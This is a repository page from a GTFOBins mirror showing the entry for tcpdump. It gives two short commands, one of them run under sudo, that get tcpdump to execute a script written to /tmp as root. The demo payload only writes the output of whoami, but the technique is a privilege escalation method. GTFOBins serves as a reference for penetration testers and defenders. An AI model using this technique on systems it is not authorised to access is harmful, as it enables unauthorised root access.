This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-18 09:35:06 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
7822ec33e88c24a0b16db48148ccb9f2848b9cf1
GTFOBins.github.io
/
_gtfobins
/
tcpdump.md
AlessandroZ
7219385a05
add new ways
2018-08-17 17:16:09 +02:00
329 B
Raw
Blame
History
functions
functions
execute-non-interactive
sudo-enabled
code
echo "whoami > /tmp/whoami" > /tmp/tmpfile tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
code
echo "whoami > /tmp/whoami" > /tmp/tmpfile sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z ./tmpfile -Z root
Reference in New Issue
View Git Blame
Copy Permalink